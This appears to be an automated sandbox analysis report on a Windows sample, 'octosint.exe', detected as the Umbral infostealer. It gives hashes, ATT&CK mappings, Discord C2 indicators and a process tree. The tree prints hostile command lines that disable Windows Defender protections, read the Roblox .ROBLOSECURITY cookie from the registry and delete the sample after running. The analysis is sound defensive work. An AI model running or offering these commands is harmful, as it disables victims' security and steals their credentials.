Analysis
-
max time kernel
98s -
max time network
141s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
30-11-2024 08:51
General
-
Target
octosint.exe
-
Size
628KB
-
MD5
b4effaa19b06eb4a92b66b0ff2702c91
-
SHA1
703aa3cec640517f6e51033c27bef4bbeb9afe9b
-
SHA256
2464cc00fd3a0e7b5fd2e171e967b2ef65fde94bff68dda2dab12e2b9dce108d
-
SHA512
d7e379b2148dc4697e7cd1529ef88bc5386f66df992afcb4423b4f24a7402b18531aee341c3dc22fe97d37583d7856a13cd1cdbeb341b042f0b547f485e09cd8
-
SSDEEP
12288:2oZtL+EP8GwI8EKtFu9r20VJg2VFRiMdRC:qI8fI8EKtFu9r20VJg2hiMdA
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/764-1-0x000002A8C5860000-0x000002A8C5904000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3620 powershell.exe 2720 powershell.exe 4232 powershell.exe 4604 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts octosint.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 discord.com 23 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4748 cmd.exe 1916 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 856 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1916 PING.EXE -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 4876 wmic.exe 4876 wmic.exe 4876 wmic.exe 4876 wmic.exe 764 octosint.exe 3620 powershell.exe 3620 powershell.exe 2720 powershell.exe 2720 powershell.exe 4232 powershell.exe 4232 powershell.exe 2848 powershell.exe 2848 powershell.exe 4972 wmic.exe 4972 wmic.exe 4972 wmic.exe 4972 wmic.exe 2896 wmic.exe 2896 wmic.exe 2896 wmic.exe 2896 wmic.exe 3156 wmic.exe 3156 wmic.exe 3156 wmic.exe 3156 wmic.exe 4604 powershell.exe 4604 powershell.exe 856 wmic.exe 856 wmic.exe 856 wmic.exe 856 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 764 octosint.exe Token: SeIncreaseQuotaPrivilege 4876 wmic.exe Token: SeSecurityPrivilege 4876 wmic.exe Token: SeTakeOwnershipPrivilege 4876 wmic.exe Token: SeLoadDriverPrivilege 4876 wmic.exe Token: SeSystemProfilePrivilege 4876 wmic.exe Token: SeSystemtimePrivilege 4876 wmic.exe Token: SeProfSingleProcessPrivilege 4876 wmic.exe Token: SeIncBasePriorityPrivilege 4876 wmic.exe Token: SeCreatePagefilePrivilege 4876 wmic.exe Token: SeBackupPrivilege 4876 wmic.exe Token: SeRestorePrivilege 4876 wmic.exe Token: SeShutdownPrivilege 4876 wmic.exe Token: SeDebugPrivilege 4876 wmic.exe Token: SeSystemEnvironmentPrivilege 4876 wmic.exe Token: SeRemoteShutdownPrivilege 4876 wmic.exe Token: SeUndockPrivilege 4876 wmic.exe Token: SeManageVolumePrivilege 4876 wmic.exe Token: 33 4876 wmic.exe Token: 34 4876 wmic.exe Token: 35 4876 wmic.exe Token: 36 4876 wmic.exe Token: SeIncreaseQuotaPrivilege 4876 wmic.exe Token: SeSecurityPrivilege 4876 wmic.exe Token: SeTakeOwnershipPrivilege 4876 wmic.exe Token: SeLoadDriverPrivilege 4876 wmic.exe Token: SeSystemProfilePrivilege 4876 wmic.exe Token: SeSystemtimePrivilege 4876 wmic.exe Token: SeProfSingleProcessPrivilege 4876 wmic.exe Token: SeIncBasePriorityPrivilege 4876 wmic.exe Token: SeCreatePagefilePrivilege 4876 wmic.exe Token: SeBackupPrivilege 4876 wmic.exe Token: SeRestorePrivilege 4876 wmic.exe Token: SeShutdownPrivilege 4876 wmic.exe Token: SeDebugPrivilege 4876 wmic.exe Token: SeSystemEnvironmentPrivilege 4876 wmic.exe Token: SeRemoteShutdownPrivilege 4876 wmic.exe Token: SeUndockPrivilege 4876 wmic.exe Token: SeManageVolumePrivilege 4876 wmic.exe Token: 33 4876 wmic.exe Token: 34 4876 wmic.exe Token: 35 4876 wmic.exe Token: 36 4876 wmic.exe Token: SeDebugPrivilege 3620 powershell.exe Token: SeIncreaseQuotaPrivilege 3620 powershell.exe Token: SeSecurityPrivilege 3620 powershell.exe Token: SeTakeOwnershipPrivilege 3620 powershell.exe Token: SeLoadDriverPrivilege 3620 powershell.exe Token: SeSystemProfilePrivilege 3620 powershell.exe Token: SeSystemtimePrivilege 3620 powershell.exe Token: SeProfSingleProcessPrivilege 3620 powershell.exe Token: SeIncBasePriorityPrivilege 3620 powershell.exe Token: SeCreatePagefilePrivilege 3620 powershell.exe Token: SeBackupPrivilege 3620 powershell.exe Token: SeRestorePrivilege 3620 powershell.exe Token: SeShutdownPrivilege 3620 powershell.exe Token: SeDebugPrivilege 3620 powershell.exe Token: SeSystemEnvironmentPrivilege 3620 powershell.exe Token: SeRemoteShutdownPrivilege 3620 powershell.exe Token: SeUndockPrivilege 3620 powershell.exe Token: SeManageVolumePrivilege 3620 powershell.exe Token: 33 3620 powershell.exe Token: 34 3620 powershell.exe Token: 35 3620 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 764 wrote to memory of 4876 764 octosint.exe 81 PID 764 wrote to memory of 4876 764 octosint.exe 81 PID 764 wrote to memory of 4144 764 octosint.exe 84 PID 764 wrote to memory of 4144 764 octosint.exe 84 PID 764 wrote to memory of 3620 764 octosint.exe 86 PID 764 wrote to memory of 3620 764 octosint.exe 86 PID 764 wrote to memory of 2720 764 octosint.exe 89 PID 764 wrote to memory of 2720 764 octosint.exe 89 PID 764 wrote to memory of 4232 764 octosint.exe 91 PID 764 wrote to memory of 4232 764 octosint.exe 91 PID 764 wrote to memory of 2848 764 octosint.exe 93 PID 764 wrote to memory of 2848 764 octosint.exe 93 PID 764 wrote to memory of 4972 764 octosint.exe 98 PID 764 wrote to memory of 4972 764 octosint.exe 98 PID 764 wrote to memory of 2896 764 octosint.exe 100 PID 764 wrote to memory of 2896 764 octosint.exe 100 PID 764 wrote to memory of 3156 764 octosint.exe 102 PID 764 wrote to memory of 3156 764 octosint.exe 102 PID 764 wrote to memory of 4604 764 octosint.exe 104 PID 764 wrote to memory of 4604 764 octosint.exe 104 PID 764 wrote to memory of 856 764 octosint.exe 106 PID 764 wrote to memory of 856 764 octosint.exe 106 PID 764 wrote to memory of 4748 764 octosint.exe 109 PID 764 wrote to memory of 4748 764 octosint.exe 109 PID 4748 wrote to memory of 1916 4748 cmd.exe 111 PID 4748 wrote to memory of 1916 4748 cmd.exe 111 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4144 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\octosint.exe"C:\Users\Admin\AppData\Local\Temp\octosint.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\octosint.exe"2⤵
- Views/modifies file attributes
PID:4144
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\octosint.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2848
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4972
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2896
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4604
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:856
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\octosint.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1916
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD5f0f59cccd39a3694e0e6dfd44d0fa76d
SHA1fccd7911d463041e1168431df8823e4c4ea387c1
SHA25670466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401
SHA5125c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee
-
Filesize
948B
MD58f6c84cfe6eec6539acbdcab85b64bc9
SHA120e3bfa53fd0e387a25e89c2ef3dc65e79b8d347
SHA256126cc6d04113893adb3baf80719b015a688af0038290267133122c97aa1ec09d
SHA512e09663afe1e450ddb015c160aa0695bbb1f87fad7edd3de21567e77dd73271b5f1abb5f93ddf53184b6e592a34516522639271e08438489ccd6afaa89e119b2b
-
Filesize
1KB
MD5cce846d4d061ab3c9c60e2e4723afc37
SHA1dbfb35606ef1ba6a8fe0761baf0a5a8d61ddc3d0
SHA25605493954effa576bee288b5da8a22c2b8cf6b3f1f7a7f49d430ff7c959e78385
SHA512c21366673b03e1fd661acba46d00200f83df5a40668f1c39abcf6e0d92370a8fc40758e487566fd7066b185f0658d9f149f293dce01235b60fbac8c40f4d7172
-
Filesize
1KB
MD571ae70397208823d9fde08454a8a07cd
SHA142d7a3ee3335543dd48e89bf73d109177de51dfa
SHA2564d2c8231db078731ab36c6e566d35184a3a8b964ed34a29048c71b7a8ad07b05
SHA51287aaff7522eb16dac69510abbe8ec2203723411605acb386e8bdfda2953887a5b4aa382ea46646b395505888cbb79f7c018beedf939ab8e7f205ef74e74e4e82
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82